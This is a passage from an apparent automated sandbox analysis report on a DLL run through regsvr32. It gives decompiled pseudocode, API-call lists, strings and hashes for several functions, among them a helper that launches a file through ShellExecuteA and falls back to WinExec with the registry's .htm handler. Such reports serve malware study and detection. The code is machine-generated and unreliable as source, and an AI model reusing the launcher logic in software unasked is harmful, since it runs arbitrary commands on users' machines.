							if(_t229 == 8) {
								L43:
								__imp__#9(_t292);
								L44:
								_t292 = _t292 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t229 - 0xe;
							if(_t229 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t289 = 0x10;
					_t297 = E6DA3D6AF(_t307,  ~(0 | _t307 > 0x00000000) | _t192 * _t289);
					 *((intOrPtr*)(_t299 - 0x54)) = _t297;
					E6DA5C5A0(_t292, _t297, _t256,  *(_t299 - 0x4c) << 4);
					_t235 =  *(_t299 + 0x18);
					_t276 =  *(_t299 - 0x4c) << 4;
					_t301 = _t301 + 0x10;
					_t36 = _t276 - 0x10; // -16
					_t277 = _t297 + _t36;
					 *(_t299 - 0x14) = _t235;
					 *(_t299 - 0x10) = _t277;
					if( *_t235 == 0) {
						goto L37;
					}
					_t236 =  *((intOrPtr*)(_t299 + 0x1c));
					_t257 = _t236 - 4;
					_t41 =  &(_t277[4]); // -8
					_t298 = _t41;
					 *(_t299 - 0x1c) = _t298;
					 *((intOrPtr*)(_t299 + 0x1c)) = _t236 + 0xfffffff8;
					do {
						_t239 =  *( *(_t299 - 0x14)) & 0x000000ff;
						 *_t277 = _t239;
						if((_t239 & 0x00000040) != 0) {
							 *_t277 = _t239 & 0x0000ffbf | 0x00004000;
						}
						_t240 =  *_t277 & 0x0000ffff;
						_t312 = _t240 - 0x4002;
						if(_t312 > 0) {
							_t241 = _t240 - 0x4003;
							__eflags = _t241 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t241 * 4 +  &M6DA5834B))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t299 + 0x1c)) =  *((intOrPtr*)(_t299 + 0x1c)) + _t292;
									_t257 = _t257 + _t292;
									_t243 =  *_t257;
									asm("sbb ecx, ecx");
									 *_t243 =  ~( *_t243) & 0x0000ffff;
									 *_t298 = _t243;
									_t244 = E6DA56CA1(_t299 - 0x34, _t298, _t243, _t243, 0);
									 *(_t299 - 4) = 3;
									E6DA57141(_t299 - 0x68, _t244);
									__eflags =  *(_t299 - 0x2c);
									 *(_t299 - 4) = 1;
									if(__eflags != 0) {
										E6DA3D6DE(_t257, _t292, _t298, __eflags,  *((intOrPtr*)(_t299 - 0x34)));
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t312 == 0) {
								L34:
								 *((intOrPtr*)(_t299 + 0x1c)) =  *((intOrPtr*)(_t299 + 0x1c)) + _t292;
								_t257 = _t257 + _t292;
								__eflags = _t257;
								 *_t298 =  *_t257;
								goto L35;
							}
							_t249 = _t240;
							if(_t249 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t249 * 4 +  &M6DA582FB))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E6DA4474C(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x10);
										_push(8);
										_pop(__eax);
										 *( *(__ebp - 0x10)) = __ax;
										__ecx =  *(__ebp - 0x18);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E6DA21430(__ecx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E6DA44860(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t299 + 0x1c)) =  *((intOrPtr*)(_t299 + 0x1c)) + _t292;
									_t257 = _t257 + _t292;
									 *_t298 =  *_t257;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						_t277 =  *(_t299 - 0x10) - 0x10;
						_t298 = _t298 - 0x10;
						 *(_t299 - 0x14) =  &(( *(_t299 - 0x14))[1]);
						 *(_t299 - 0x10) = _t277;
						 *(_t299 - 0x1c) = _t298;
					} while ( *( *(_t299 - 0x14)) != 0);
					_t256 = 0;
					goto L37;
				}
			}

0x6da57e0f
0x6da57e16
0x6da57e1b
0x6da57e1e
0x6da57e22
0x6da582f3
0x6da582f8
0x6da582f8
0x6da57e28
0x6da57e2b
0x6da57e2e
0x6da57e31
0x6da57e3b
0x6da57e3e
0x6da57e43
0x6da57e49
0x6da57e54
0x6da57e54
0x6da57e5b
0x6da57e62
0x6da57e67
0x6da57e6e
0x6da57e6e
0x6da57e71
0x6da57e78
0x6da57e7b
0x6da57e7e
0x6da57e81
0x6da57e84
0x6da57e89
0x6da57e8d
0x6da57e8e
0x6da57e90
0x6da580b0
0x6da580b4
0x6da580b6
0x6da580bf
0x6da580c1
0x6da580c1
0x6da580ce
0x6da580d8
0x6da58104
0x6da58107
0x6da5810c
0x6da58111
0x6da5813c
0x6da5813f
0x6da58148
0x6da5814b
0x6da58220
0x6da58220
0x6da58226
0x6da582db
0x6da582de
0x6da582e2
0x6da582e7
0x6da582e7
0x6da582e7
0x6da582ee
0x00000000
0x6da582ee
0x6da58230
0x6da58255
0x6da58258
0x6da5825b
0x6da5825e
0x00000000
0x00000000
0x6da58260
0x00000000
0x6da58271
0x6da58278
0x00000000
0x00000000
0x6da582d3
0x6da582d6
0x6da582d9
0x00000000
0x00000000
0x6da58290
0x6da58293
0x00000000
0x00000000
0x6da5829a
0x6da5829d
0x00000000
0x00000000
0x6da5827d
0x6da58280
0x6da58283
0x6da58285
0x6da58288
0x00000000
0x00000000
0x6da582a7
0x6da582ac
0x6da582af
0x00000000
0x00000000
0x6da582b7
0x6da582ba
0x6da582bc
0x6da582c0
0x6da582c3
0x00000000
0x00000000
0x6da582c7
0x6da582ca
0x6da582cd
0x6da582ce
0x6da582cf
0x6da582d0
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5826d
0x00000000
0x00000000
0x6da58260
0x6da58234
0x6da58239
0x6da5823f
0x6da58241
0x6da58243
0x00000000
0x00000000
0x6da58249
0x6da5824f
0x6da58167
0x6da58167
0x6da5816c
0x6da5816c
0x6da5816f
0x6da58178
0x6da58178
0x6da5817d
0x6da58183
0x6da58186
0x6da5818a
0x6da5818c
0x6da5818e
0x6da58196
0x6da58197
0x6da5819d
0x6da5819d
0x6da5819f
0x6da581a5
0x6da581ab
0x6da581b3
0x6da581bb
0x6da581be
0x6da581be
0x6da581c9
0x6da581cf
0x6da581d1
0x6da581d8
0x6da581dd
0x6da581e0
0x6da581e0
0x6da581e8
0x6da581ea
0x6da581f1
0x6da581f6
0x6da581f9
0x6da581f9
0x6da58201
0x6da58206
0x6da5820c
0x6da58218
0x6da5821b
0x00000000
0x6da5821b
0x6da58155
0x6da5815b
0x6da58162
0x00000000
0x00000000
0x6da58164
0x00000000
0x6da58113
0x6da58116
0x6da5811c
0x6da58137
0x6da58137
0x6da5813a
0x00000000
0x00000000
0x6da58122
0x6da58124
0x6da58126
0x6da5812c
0x6da5812d
0x6da58133
0x6da58133
0x6da58136
0x6da58136
0x00000000
0x6da58136
0x6da58128
0x6da5812a
0x00000000
0x00000000
0x00000000
0x6da5812a
0x00000000
0x6da58137
0x6da57e96
0x6da57e9a
0x6da57eaa
0x6da57eb5
0x6da57eb8
0x6da57ec0
0x6da57ec3
0x6da57ec6
0x6da57ecc
0x6da57ecc
0x6da57ed0
0x6da57ed3
0x6da57ed6
0x00000000
0x00000000
0x6da57edc
0x6da57edf
0x6da57ee2
0x6da57ee2
0x6da57ee8
0x6da57eeb
0x6da57eee
0x6da57ef1
0x6da57ef5
0x6da57efa
0x6da57f06
0x6da57f06
0x6da57f09
0x6da57f11
0x6da57f13
0x6da58031
0x6da58036
0x6da58039
0x00000000
0x00000000
0x6da5803b
0x00000000
0x00000000
0x00000000
0x6da58042
0x6da58045
0x6da58047
0x6da5804d
0x6da58057
0x6da5805e
0x6da58060
0x6da58069
0x6da5806d
0x6da58072
0x6da58076
0x6da5807a
0x6da5807f
0x6da58084
0x00000000
0x00000000
0x00000000
0x00000000
0x6da57f19
0x6da57f19
0x6da58087
0x6da58087
0x6da5808a
0x6da5808a
0x6da5808e
0x00000000
0x6da5808e
0x6da57f20
0x6da57f24
0x00000000
0x00000000
0x6da57f2a
0x00000000
0x6da57f3f
0x6da57f42
0x6da57f44
0x00000000
0x00000000
0x00000000
0x00000000
0x6da57f67
0x6da57f6b
0x6da57f70
0x6da57f73
0x00000000
0x00000000
0x6da57f7a
0x6da57f7e
0x6da57f83
0x6da57f86
0x00000000
0x00000000
0x6da57f8d
0x6da57f90
0x6da57f92
0x00000000
0x00000000
0x6da57f96
0x6da57f99
0x6da57f9b
0x6da57f9d
0x6da57f9e
0x6da57fa1
0x6da57fa7
0x6da57fab
0x6da57fad
0x00000000
0x00000000
0x6da57fb3
0x6da57fb5
0x00000000
0x00000000
0x00000000
0x00000000
0x6da58009
0x6da5800c
0x6da58010
0x6da58012
0x6da58014
0x6da58014
0x00000000
0x00000000
0x6da58019
0x6da5801d
0x6da58020
0x6da58023
0x6da58025
0x6da58026
0x6da58027
0x6da58028
0x6da58029
0x6da5802c
0x6da5802e
0x00000000
0x00000000
0x6da57fc0
0x6da57fc0
0x6da57fc3
0x6da57fc5
0x6da57fc7
0x6da57fc8
0x6da57fcb
0x6da57fce
0x6da57fd3
0x6da57fd6
0x6da57fda
0x6da57fe0
0x6da57fe4
0x6da57fe6
0x6da57fec
0x6da57fec
0x6da57fef
0x6da57ff1
0x6da57ff2
0x6da57ff5
0x6da57ff8
0x6da57ffb
0x6da57fff
0x00000000
0x6da57fff
0x6da57fe8
0x6da57fea
0x6da57fbb
0x6da57fbb
0x00000000
0x6da57fbb
0x00000000
0x00000000
0x00000000
0x00000000
0x6da57f31
0x6da57f34
0x6da57f38
0x00000000
0x00000000
0x6da57f4c
0x6da57f4f
0x6da57f52
0x6da57f55
0x6da57f55
0x6da57f58
0x6da57f58
0x6da57f5a
0x6da57f5f
0x00000000
0x00000000
0x6da57f2a
0x6da58090
0x6da58093
0x6da58096
0x6da58099
0x6da580a2
0x6da580a5
0x6da580a5
0x6da580ae
0x00000000
0x6da580ae

APIs

__EH_prolog3.LIBCMT ref: 6DA57E16
lstrlenA.KERNEL32(?,00000004,00000000,6DA5810C), ref: 6DA57E4E
VariantClear.OLEAUT32(?), ref: 6DA58155
SysStringLen.OLEAUT32(?), ref: 6DA581AF
SysFreeString.OLEAUT32(?), ref: 6DA581CF
SysStringLen.OLEAUT32(?), ref: 6DA581D4

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: String$ClearFreeH_prolog3Variantlstrlen
String ID:
API String ID: 4264810750-0
Opcode ID: fbfc6c51eb29879b3d96ca010ba6b5f30957019ee7340aa1ec3fb9613bbb21a2
Instruction ID: 95932028dddca76267126767b9c790e69983c3d7284521ec0eb8105af27a9f39
Opcode Fuzzy Hash: fbfc6c51eb29879b3d96ca010ba6b5f30957019ee7340aa1ec3fb9613bbb21a2
Instruction Fuzzy Hash: F8F19DB5D1830ADFDF01CFA8C984AAEBBB4FF05304F148059E951AB290DB749AA5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6DA23940 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 90
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E6DA23940() {
				char _v8;
				char _v16;
				intOrPtr* _v20;
				void* __ecx;
				signed int _t40;
				intOrPtr* _t62;
				signed int _t91;

				_push(0xffffffff);
				_push(E6DA6DDAC);
				_push( *[fs:0x0]);
				_push(_t62);
				_t40 =  *0x6da82744; // 0x616b45bb
				_push(_t40 ^ _t91);
				 *[fs:0x0] =  &_v16;
				_v20 = _t62;
				E6DA23B10(_v20);
				_v8 = 0;
				 *_v20 = 0x6da71154;
				E6DA21CE0(_v20 + 0x54);
				E6DA21CE0(_v20 + 0x5c);
				E6DA23AA0(_v20 + 0x68);
				_v8 = 1;
				E6DA212E0(_v20 + 0x78);
				_v8 = 2;
				E6DA21C90(_v20 + 0xc0);
				_v8 = 3;
				E6DA21340(_v20 + 0x78, "%ld");
				 *((intOrPtr*)(_v20 + 0x7c)) = 7;
				 *((intOrPtr*)(_v20 + 0x70)) = 0;
				 *((char*)(_v20 + 0x74)) = 0;
				 *((char*)(_v20 + 0x80)) = 0;
				 *((char*)(_v20 + 0x83)) = 0;
				 *((char*)(_v20 + 0x81)) = 0;
				GetObjectA(GetStockObject(0x11), 0x3c, _v20 + 0x84);
				E6DA22250(_v20 + 0xc0, _v20 + 0x84);
				 *((intOrPtr*)(_v20 + 0xc8)) = GetSysColor(8);
				 *((intOrPtr*)(_v20 + 0xcc)) = CreateSolidBrush(GetSysColor(0xf));
				 *((intOrPtr*)(_v20 + 0xd0)) = CreateSolidBrush(GetSysColor(0xf));
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v20;
			}

0x6da23943
0x6da23945
0x6da23950
0x6da23951
0x6da23952
0x6da23959
0x6da2395d
0x6da23963
0x6da23969
0x6da2396e
0x6da23978
0x6da23984
0x6da2398f
0x6da2399a
0x6da2399f
0x6da239a9
0x6da239ae
0x6da239bb
0x6da239c0
0x6da239cf
0x6da239d7
0x6da239e1
0x6da239eb
0x6da239f2
0x6da239fc
0x6da23a06
0x6da23a22
0x6da23a3b
0x6da23a4b
0x6da23a63
0x6da23a7b
0x6da23a81
0x6da23a8e
0x6da23a99

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 6DA23969
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 6DA2399A
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 6DA239BB
_DebugHeapAllocator.LIBCPMTD ref: 6DA239CF

Part of subcall function 6DA21340: _DebugHeapAllocator.LIBCPMTD ref: 6DA2134E

GetStockObject.GDI32(00000011), ref: 6DA23A1B
GetObjectA.GDI32(00000000), ref: 6DA23A22

Part of subcall function 6DA22250: CreateFontIndirectA.GDI32(?), ref: 6DA2225B

GetSysColor.USER32 ref: 6DA23A42
GetSysColor.USER32 ref: 6DA23A53
CreateSolidBrush.GDI32(00000000), ref: 6DA23A5A
GetSysColor.USER32 ref: 6DA23A6B
CreateSolidBrush.GDI32(00000000), ref: 6DA23A72

Strings

%ld, xrefs: 6DA239C4

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ProcessorVirtual$ColorConcurrency::CreateRootRoot::$AllocatorBrushDebugHeapObjectSolid$FontIndirectStock
String ID: %ld
API String ID: 3885780416-1112595699
Opcode ID: 0be8e68f3992fb05770bed06c3d9278d75cd3ebc8fffbdae74e96d03a6c3eb85
Instruction ID: 8f89ec0d0b50aa1a41c5f39a423b1f38f45944296a40577a67cf2de636a0705b
Opcode Fuzzy Hash: 0be8e68f3992fb05770bed06c3d9278d75cd3ebc8fffbdae74e96d03a6c3eb85
Instruction Fuzzy Hash: 94419EB4A08256CFDB04DF98CD54BBEB7B4FF45308F048668D525AB382CB765801CB65

Uniqueness

Uniqueness Score: -1.00%

Function 6DA22D10 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 88
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E6DA22D10(void* __ebx, void* __edi, void* __esi, char* _a4, int _a8) {
				signed int _v8;
				char _v532;
				int _v536;
				CHAR* _v540;
				signed int _t30;
				void* _t50;
				void* _t62;
				void* _t63;
				signed int _t64;

				_t63 = __esi;
				_t62 = __edi;
				_t50 = __ebx;
				_t30 =  *0x6da82744; // 0x616b45bb
				_v8 = _t30 ^ _t64;
				_v536 = ShellExecuteA(0, "open", _a4, 0, 0, _a8);
				if(_v536 <= 0x20) {
					_t59 =  &_v532;
					if(E6DA22A80(0x80000000, ".htm",  &_v532) == 0) {
						lstrcatA( &_v532, "\\shell\\open\\command");
						_t59 =  &_v532;
						if(E6DA22A80(0x80000000,  &_v532,  &_v532) == 0) {
							_v540 = E6DA22E90( &_v532, "\"%1\"");
							if(_v540 != 0) {
								 *_v540 = 0;
							} else {
								_v540 = E6DA22E70( &_v532, "%1");
								if(_v540 != 0) {
									 *_v540 = 0;
								} else {
									_v540 = _t64 + lstrlenA( &_v532) - 0x211;
								}
							}
							lstrcatA(_v540, " ");
							_t59 = _v540;
							lstrcatA(_v540, _a4);
							_v536 = WinExec( &_v532, _a8);
						}
					}
				}
				return E6DA59DE2(_v536, _t50, _v8 ^ _t64, _t59, _t62, _t63);
			}

0x6da22d10
0x6da22d10
0x6da22d10
0x6da22d19
0x6da22d20
0x6da22d3c
0x6da22d49
0x6da22d4f
0x6da22d6a
0x6da22d7c
0x6da22d89
0x6da22d9f
0x6da22db9
0x6da22dc6
0x6da22e18
0x6da22dc8
0x6da22ddc
0x6da22de9
0x6da22e0d
0x6da22deb
0x6da22dff
0x6da22dff
0x6da22e10
0x6da22e27
0x6da22e31
0x6da22e38
0x6da22e4f
0x6da22e4f
0x6da22d9f
0x6da22d6a
0x6da22e68

APIs

ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,6DA22EEC), ref: 6DA22D36

Part of subcall function 6DA22A80: RegOpenKeyExA.ADVAPI32(?,80000000,00000000,00000001,?), ref: 6DA22AA3
Part of subcall function 6DA22A80: RegQueryValueA.ADVAPI32(?,00000000,?,00000104), ref: 6DA22ACA
Part of subcall function 6DA22A80: lstrcpyA.KERNEL32(6DA22D65,?), ref: 6DA22ADB
Part of subcall function 6DA22A80: RegCloseKey.ADVAPI32(?), ref: 6DA22AE5

lstrcatA.KERNEL32(?,\shell\open\command), ref: 6DA22D7C
lstrlenA.KERNEL32(?), ref: 6DA22DF2
lstrcatA.KERNEL32(00000000,6DA70C4C), ref: 6DA22E27
lstrcatA.KERNEL32(00000000,00000000), ref: 6DA22E38
WinExec.KERNEL32 ref: 6DA22E49

Strings

.htm, xrefs: 6DA22D56
open, xrefs: 6DA22D2F
, xrefs: 6DA22D42
"%1", xrefs: 6DA22DA5
\shell\open\command, xrefs: 6DA22D70

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: lstrcat$CloseExecExecuteOpenQueryShellValuelstrcpylstrlen
String ID: $"%1"$.htm$\shell\open\command$open
API String ID: 2095745534-2117809343
Opcode ID: 16de2d057b74a09c0acf178be90f64a3c07d7f203108fd2021d8fdc52af7c619
Instruction ID: 7cc3aded7a8a0b40229af199e509d36d2ecdb9514d41d6071b779b5aea67f890
Opcode Fuzzy Hash: 16de2d057b74a09c0acf178be90f64a3c07d7f203108fd2021d8fdc52af7c619
Instruction Fuzzy Hash: A831907985821CAFCB60DF61CD88BE97B74BB29300F0445D8EA09A6240EB715AC5CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5F568 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E6DA5F568(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x6da7ec08);
				E6DA5C918(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E6DA5D127(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x6da76668;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x6da829b0;
				E6DA641AD(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E6DA5F63D();
				E6DA641AD(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x6da82fb8; // 0x6da82ee0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E6DA6323D( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E6DA5C95D(E6DA5F646());
			}

0x6da5f568
0x6da5f568
0x6da5f56a
0x6da5f56f
0x6da5f574
0x6da5f57a
0x6da5f582
0x6da5f585
0x6da5f58a
0x6da5f58b
0x6da5f58e
0x6da5f591
0x6da5f59b
0x6da5f5a0
0x6da5f5a8
0x6da5f5b0
0x6da5f5c0
0x6da5f5c0
0x6da5f5c6
0x6da5f5c9
0x6da5f5d0
0x6da5f5d7
0x6da5f5e0
0x6da5f5e6
0x6da5f5ed
0x6da5f5f3
0x6da5f5fa
0x6da5f601
0x6da5f607
0x6da5f60a
0x6da5f60d
0x6da5f612
0x6da5f614
0x6da5f619
0x6da5f619
0x6da5f61f
0x6da5f625
0x6da5f636

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6DA7EC08,0000000C,6DA5F6A3,00000000,00000000,?,6DA63E6D,00000000,00000001,00000000,?,6DA64137,00000018,6DA7ECF8,0000000C), ref: 6DA5F57A
__crt_waiting_on_module_handle.LIBCMT ref: 6DA5F585

Part of subcall function 6DA5D127: Sleep.KERNEL32(000003E8,00000000,?,6DA5F4CB,KERNEL32.DLL,?,?,6DA5F85F,00000000,?,6DA5ADF0,00000000,?,?,?,6DA5AE53), ref: 6DA5D133
Part of subcall function 6DA5D127: GetModuleHandleW.KERNEL32(00000000,?,6DA5F4CB,KERNEL32.DLL,?,?,6DA5F85F,00000000,?,6DA5ADF0,00000000,?,?,?,6DA5AE53,?), ref: 6DA5D13C

GetProcAddress.KERNEL32(00000000,EncodePointer,?,6DA63E6D,00000000,00000001,00000000,?,6DA64137,00000018,6DA7ECF8,0000000C,6DA641C8,00000000,00000000), ref: 6DA5F5AE
GetProcAddress.KERNEL32(00000000,DecodePointer,?,6DA63E6D,00000000,00000001,00000000,?,6DA64137,00000018,6DA7ECF8,0000000C,6DA641C8,00000000,00000000), ref: 6DA5F5BE
__lock.LIBCMT ref: 6DA5F5E0
InterlockedIncrement.KERNEL32(?), ref: 6DA5F5ED
__lock.LIBCMT ref: 6DA5F601
___addlocaleref.LIBCMT ref: 6DA5F61F

Strings

EncodePointer, xrefs: 6DA5F5A2
KERNEL32.DLL, xrefs: 6DA5F574, 6DA5F579, 6DA5F584
DecodePointer, xrefs: 6DA5F5B6

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 294d4a75a57dc0d934224546b585574d48e3d3929f5f954835b57654d28e71b0
Instruction ID: 644e52acece2354432ef22ddfe4af312b9c6af18a9e734f55dedaf430f99fd5b
Opcode Fuzzy Hash: 294d4a75a57dc0d934224546b585574d48e3d3929f5f954835b57654d28e71b0
Instruction Fuzzy Hash: AD11D37580D741EEE7209F79C900B5ABBF0BF45314F10851DD9A9A3290CB74AAC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 6DA45D23 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E6DA45D23(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebp;
				intOrPtr _t5;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t18;
				char _t22;
				intOrPtr _t24;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t26;

				_push(__ecx);
				_t5 = __ecx;
				_t16 = _a4;
				 *((intOrPtr*)(__ecx)) = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_v8 = __ecx;
				_t22 =  *0x6da858ac; // 0x0
				if(_t22 == 0) {
					_t18 = GetModuleHandleA("KERNEL32");
					if(_t18 == 0) {
						L2:
						E6DA44898(_t16);
					}
					 *0x6da8589c = GetProcAddress(_t18, "CreateActCtxA");
